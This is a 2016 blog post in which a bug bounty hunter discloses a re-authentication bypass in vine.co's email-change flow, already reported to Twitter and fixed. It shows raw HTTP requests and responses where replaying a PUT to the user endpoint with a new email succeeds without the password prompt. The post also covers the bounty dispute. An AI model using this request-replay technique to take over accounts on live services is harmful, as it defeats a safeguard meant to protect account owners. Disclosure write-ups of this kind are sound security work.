Wednesday, September 21, 2016

Vine Re-Auth bypass [Twitter bug bounty]





Hi , today I will share an old bug that I found in 2014 at vine.co . 


Interdiction 

I was exploring  Twitter when I saw @0xSobky publish a tweet saying he found XSS by change the HTTP method in vine.co . Now this back me in time I was hunting  bugs there for a while before they started thier BB with twitter . I am too late because an army of hackers was looking there so the good bugs already has been found  . It is about thinking out side the box and find new attacks , new ideas and look smarter than others . 

In 2014 I was 17 years old and I was really busy in study . So I didn't have time to do BB all the time but I was take breaks to do some BB . I am familiar with vine.co platform because I did some bugs hunting there in early time . And found some bugs I reported to twitter when they weren't use Hackerone  platform . I got hall of fame 




The finding 



After I opened the vine.co and start remembering the permissions , feature ,and mechanism .    
I do some XSS , CSRF , IDOR tests but to no avail . It is the time to think out side the box 
I want to change the email to an email that already registered 
I entered the account settings page there are a few things can work with . 





Trying to change email from abdullah.test1@gmail.com to abdullah.test12@gmail.com just to check the mechanism .  





When I clicked "Save"  this form appeared ! 



When I was hunting bugs there in vine.co there. this form wasn't here so it is a new feature ! and I remembered that I suggested on twitter team to make a Re-Auth to email change mechanism so CSRF and XSS won't be useful to change email like Medium XSS . 

I tried to use this form to Brute-force the password it was allow only 10 or 12 attempts so it isn't vulnerable. 

There were something attractive me the request look like this : 



POST /api/users/authenticate HTTP/1.1
Host: vine.co
User-Agent: Yours
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
x-vine-client: vinewww/2.1
x-vine-client-ip: XXX.239.XXX.15
vine-session-id: 1190983260029XXXX84-XXXXXX-XXX-XXXX-bf49-dfc5XXX22196c
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://vine.co/settings
Content-Length: 53
Cookie: __utma=204412823.2104088898.1474326278.1474326278.1474385286.2; __utmz=204412823.1474326278.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=204412823.15.9.1474387114630; __utmc=204412823
Connection: close

action=change-email&username=abdullah.test1%40gmail.com&password=my-pAs*w0rd 

I notice that the new email didn't included in this request this mean it is submitted in some where else . after the right Re-Auth this request will be made .



PUT /api/users/1190983260029763584 HTTP/1.1
Host: vine.co
User-Agent: Yours
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
x-vine-client: vinewww/2.1
x-vine-client-ip: XXX.239.XXX.15
vine-session-id: 11909832600XX763584-XXXXX-XXXXX-XXXX-bf49-dfcXX422196c
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://vine.co/settings
Content-Length: 33
Cookie: __utma=204412823.2104088898.1474326278.1474326278.1474385286.2; __utmz=204412823.1474326278.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=204412823.8.9.1474385736853; __utmc=204412823; __utmt=1
Connection: close

email=abdullah.test12%40gmail.com

Response was


HTTP/1.1 200 OK
Cache-Control: private, no-store, must-revalidate
Content-Disposition: attachment; filename=unknown_file.json
Content-Type: application/json
Date: DATE HERE
Expires: 0
Pragma: no-cache
Strict-Transport-Security: max-age=631138519
Content-Length: 54
Connection: Close

{"code": "", "data": {}, "success": true, "error": ""}



I saved this request and try to compare  to non Re-Auth actions like set new URL to the account



PUT /api/users/1190983260029763584/vanity/hacker123 HTTP/1.1
Host: vine.co
User-Agent: Yours 
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
x-vine-client: vinewww/2.1
x-vine-client-ip: XXX.241.XXX.183
vine-session-id: 11909832600297635XX-ac83eaab-XXXX-XXXX-bf49-dfc56422196c
X-Requested-With: XMLHttpRequest
Referer: https://vine.co/settings
Cookie: __utma=204412823.2104088898.1474326278.1474386225.1474455441.4; __utmz=204412823.1474326278.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=204412823; __utmb=204412823.1.10.1474455441; __utmt=1
Connection: close
Content-Length: 0



There aren't any extra header or token or any kind between the two HTTP requests . Now let's log out and try to make the change email action using the old request .


I logged out and back to the account and made the request using the same endpoint /api/users/1190983260029763584 

First I made request to change URL  


PUT /api/users/1190983260029763584/vanity/hacker123 HTTP/1.1
Host: vine.co
User-Agent: Yours 
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
x-vine-client: vinewww/2.1
x-vine-client-ip: XXX.241.XXX.183
vine-session-id: 11909832600297635XX-ac83eaab-XXXX-XXXX-bf49-dfc56422196c
X-Requested-With: XMLHttpRequest
Referer: https://vine.co/settings
Cookie: __utma=204412823.2104088898.1474326278.1474386225.1474455441.4; __utmz=204412823.1474326278.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=204412823; __utmb=204412823.1.10.1474455441; __utmt=1
Connection: close
Content-Length: 0



I added Content-Type  into the HTTP header to make PUT request with a body  and change the api endpoint to /api/users/1190983260029763584  and add parameter email in body  the new request looks like this : 



PUT /api/users/1190983260029763584 HTTP/1.1
Host: vine.co
User-Agent: Yours 
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
x-vine-client: vinewww/2.1
x-vine-client-ip: XXx.239.xxx.15
vine-session-id: 1190983260029XXX3584-XXXXX-XXXXX-48ee-bf49-XXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://vine.co/settings
Content-Length: 33
Cookie: __utma=204412823.2104088898.1474326278.1474326278.1474385286.2; __utmz=204412823.1474326278.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=204412823.8.9.1474385736853; __utmc=204412823; __utmt=1
Connection: close

email=abdullah.hacker%40gmail.com

And I got this !!


HTTP/1.1 200 OK
Cache-Control: private, no-store, must-revalidate
Content-Disposition: attachment; filename=unknown_file.json
Content-Type: application/json
Date: date 
Expires: 0
Pragma: no-cache
Strict-Transport-Security: max-age=631138519
Content-Length: 54
Connection: Close

{"code": "", "data": {}, "success": true, "error": ""}

The request  was accepted !! without put user name or password (Re-Auth) .

Now I know this is not a really good bypass because attacker  need a physical access to user account , or get his cookies . But it is still a good bypass for this mechanism and they put it here for a reason and I bypassed it . Now time to report to Twitter team .

Here is a video for PoC :






I wrote the report and sent it to them using H1 platform

I got this message in the same day




Okay it is too good let's wait the bounty now but this wasn't the end I got this replay after 2 days from triaged my bug 




Wait a second .... What ?!!?!? 

This replay made me mad because it wasn't even sense . it is time to write some "RESPECTFUL" replay with a more explain or objection on the decision without use mean words like " taxi driver " or  something like " You losers nobody follow you on your account " in BB you should always respect the teams that you work with them they don't have any reason to drop your report . In some cases (happens to me) they get a wrong ideas for the report sometime because their little experience or your bad explain and browsers,addons...etc 


I wrote some points here are some of : 

  1.  I reported vulnerability in vine.co , so it is not the IOS platform so any weak  in IOS app is not close to my report . 
  2. Is this new security style if you have weakness in mobile apps that is mean you should have in the website ?
  3. You have a security feature in vine.co and I bypassed it  . how bug bounty should be ?     



and a lot of explain in one replay . Twitter team were very professional and replayed : 





I got my bounty and Twitter fixed the bug yesterday (-1 Twitter team) and everyone is happy :) 


Conclusion

Always believe in your skills and act the good behave with security teams . plus check the new feature and requests endpoint . 


That is all if you like it or want to ask put a comment or follow me on twitter @Abdulahhusam 

Thanks for read